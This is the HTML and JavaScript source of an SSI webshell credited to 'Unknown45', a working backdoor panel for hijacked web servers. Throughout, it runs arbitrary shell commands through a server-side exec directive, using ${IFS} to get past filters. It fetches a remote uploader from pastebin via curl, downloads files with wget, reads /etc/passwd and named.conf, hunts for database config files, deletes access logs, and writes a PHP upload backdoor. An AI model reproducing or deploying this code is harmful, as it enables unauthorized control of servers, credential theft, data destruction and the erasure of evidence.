SSI Webshell x

SSI Webshell x<title>SSI Webshell x</title><meta name="theme-color" content="#000"><meta name="Author" content="Unknown45"><meta name="description" content="Security ? that just an illusion - "><meta property="og:description" content="Security ? that just an illusion - "><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/pace-js@latest/pace.min.js"></script><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/pace-js@latest/pace-theme-default.min.css"><script language="javascript">function unknown45(){ var uri = document.getElementById('command').value; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="?"+encodeURI(rep)+"&&test";}function refresh() { document.location.href="";}function checkfile() { document.location.href="?"+"ls${IFS}-la";} function readpass() { var selectedobj=document.getElementById('readpass'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function readnamed() { var selectedobj=document.getElementById('readnamed'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function movefiles() { var selectedobj=document.getElementById('movefiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function upfiles() { var selectedobj=document.getElementById('upfiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function renamefiles() { var selectedobj=document.getElementById('renamefiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function deletefiles() { var selectedobj=document.getElementById('deletefiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function findfiles() { var selectedobj=document.getElementById('findfiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }}function addupload(){ document.location.href="?"+"curl${IFS}-Ls${IFS}pastebin.com/raw/YW8i930B${IFS}|${IFS}tee${IFS}-a${IFS}uploader.php";}function checkroot() { var uri = "ls -la "; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="?"+encodeURI(rep)+"";}function deletelog() { var yakin = confirm("yakin hapus access logs nya ?"); if (yakin == true) { var uri = "rm -rf "; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="?"+encodeURI(rep)+"/../logs/ *";} else { return true;}}function delsel() { var uri = "rm -rf "; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="?"+encodeURI(rep)+" |${IFS}clear${IFS}&&${IFS}echo${IFS}Done";}function movesatu(){ document.location.href="?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../"+document.getElementById('movefile').value;}function movedua(){ document.location.href="?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../../"+document.getElementById('movefile').value;}function movetiga(){ document.location.href="?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../../../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../../../"+document.getElementById('movefile').value;}function moveroot(){ document.location.href="?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}/"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}/"+document.getElementById('movefile').value;}function upfile(){ var url = document.getElementById('linknya').value; var https = url.split("https://").join(""); var http = https.split("http://").join(""); document.location.href="?"+"wget${IFS}"+encodeURI(http)+"${IFS}"+"--no-check-certificate${IFS}&&${IFS}ls${IFS}-la";}function renamefile(){ document.location.href="?"+"mv${IFS}"+document.getElementById('renameawal').value+"${IFS}"+document.getElementById('renameakhir').value+"${IFS}&&${IFS}ls${IFS}-la";}function deletefile(){ document.location.href="?"+"rm${IFS}-rf${IFS}"+document.getElementById('deletefile').value+"${IFS}&&${IFS}ls${IFS}-la";}function deleteinroot(){ var yakin = confirm("yakin hapus file ini di directory root ?"); if (yakin == true) { document.location.href="?"+"rm${IFS}-rf${IFS}"+"/"+document.getElementById('deletefile').value+"${IFS}&&${IFS}ls${IFS}-la${IFS}";} else { return true;}}function deletefiledua(){ document.location.href="?"+"rm${IFS}-rf${IFS}"+document.getElementById('deletedir').value+"/"+document.getElementById('deletefiledua').value+"${IFS}&&${IFS}ls${IFS}-la${IFS}"+document.getElementById('deletedir').value;}function findfile(){ document.location.href="?"+"du${IFS}-ah${IFS}"+"|${IFS}grep${IFS}"+document.getElementById('findfile').value;}function findinroot(){ document.location.href="?"+"du${IFS}-ah${IFS}"+"${IFS}"+"|${IFS}grep${IFS}"+document.getElementById('findfile').value;}function findfiledua(){ document.location.href="?"+"du${IFS}-ah${IFS}"+document.getElementById('finddir').value+"${IFS}|${IFS}grep${IFS}"+document.getElementById('findfiledua').value;}function finddb(){ document.location.href="?"+"du${IFS}-ah${IFS}"+"${IFS}"+"|${IFS}grep${IFS}-e${IFS}config.php${IFS}-e${IFS}database.php${IFS}-e${IFS}config.inc.php${IFS}-e${IFS}koneksi.php";}</script><style type="text/css"> .input { background: transparent; border-color: #ffffff; border-width: thin; border: groove; cursor: pointer; } button { cursor: pointer; }</style><body onload="checkaja()"><font face=courier size=2><i>SSI Webshell by Unknown45<hr><font face="courier" size=2><font size=2>Command : <input type=text size=60 id=command class="text" name="address1" style="max-width: 100%; max-height: 100%;"> <button class="input" id="gas" onclick="unknown45();">Execute</button>

Host : 
Server Address : 
Wget Shell : 
Wget Shell : 
Echo Shell : <!--#exec cmd=" if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo$_FILES["0"]["name"];}}else{echo"

<input type=file name=0><input name=0 type=submit value=up>";}' >ya3.php" -->
System : 
</i> Python :  |  MySql :  |  Perl :  | Ruby :  | Wget : <hr> <button onclick="refresh()" style="float: left;">Refresh</button> <button onclick="checkfile()">list file</button> <button onclick="renamefiles()">rename file</button> <button onclick="movefiles()">move file</button> <button onclick="deletefiles()">delete file</button> <button onclick="findfiles()">find file</button> <button onclick="upfiles()">upload file</button> <button onclick="delsel()" style="float: right;">Remove Shell</button>

<button onclick="readpass();">read /etc/passwd</button> <button onclick="readnamed();">read /etc/named.conf</button> <button onclick="addupload()">add uploader.php</button> <button onclick="checkroot()">check root directory</button> <button onclick="deletelog()">delete access logs</button><hr></i>Executed Command : </font><font face="courier" id="cmd"></font>
<textarea bgcolor=#e4e0d8 cols=121 rows=15 style="width: 100%"></textarea><script> var cmd = document.getElementById("cmd").innerHTML.split("${IFS}").join(" "); document.getElementById("cmd").innerHTML = cmd; var gaskan = document.getElementById("command"); gaskan.addEventListener("keyup", function(event) { if (event.keyCode === 13) { event.preventDefault(); document.getElementById("gas").click(); }});</script><font face="courier" size="2" id="readpass" style="display:none">
Read : /etc/passwd
<textarea bgcolor=#e4e0d8 cols=121 rows=15></textarea></font><font face="courier" size="2" id="readnamed" style="display:none">
Read : /etc/named.conf
<textarea bgcolor=#e4e0d8 cols=121 rows=15></textarea></font><font face="courier" size="2" id="movefiles" style="display:none">
Move file to previous directory

filename : <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="movefile" style="resize: none; outline: none" required></textarea> <button onclick="movesatu()">1 directory</button> <button onclick="movedua()">2 directory</button> <button onclick="movetiga()">3 directory</button> <button onclick="moveroot()">root directory</button></font><font face="courier" size="2" id="renamefiles" style="display:none">
Rename file

<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="renameawal" style="resize: none; outline: none" required></textarea> to <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="renameakhir" style="resize: none; outline: none" required></textarea>
<button onclick="renamefile()">Gaskan</button></font><font face="courier" size="2" id="upfiles" style="display:none">
Upload file

Link : <textarea bgcolor="#e4e0d8" cols="100" rows="1" id="linknya" style="resize: none; outline: none" required></textarea> <button onclick="upfile()">Gaskan</button></font><font face="courier" size="2" id="deletefiles" style="display:none">
delete file
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletefile" style="resize: none; outline: none" required></textarea> <button onclick="deletefile()">Delete</button> <button onclick="deleteinroot()">Delete this in root directory</button>

delete file in custom directories
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletefiledua" style="resize: none; outline: none" required></textarea> in directory <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletedir" style="resize: none; outline: none" required></textarea> <button onclick="deletefiledua()">Delete</button></font><font face="courier" size="2" id="findfiles" style="display:none">
find files
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="findfile" style="resize: none; outline: none" required></textarea> <button onclick="findfile()">Find</button> <button onclick="finddb()">find database location (beta)</button> <button onclick="findinroot()">Find this in root directory</button>

find files in custom directories
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="findfiledua" style="resize: none; outline: none" required></textarea> in directory <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="finddir" style="resize: none; outline: none" required></textarea> <button onclick="findfiledua()">Find</button></font><hr> <font face="courier" size=2>Unknown45 - 2021
<a href="https://exploits.site" target="_blank">https://exploits.site</a></font>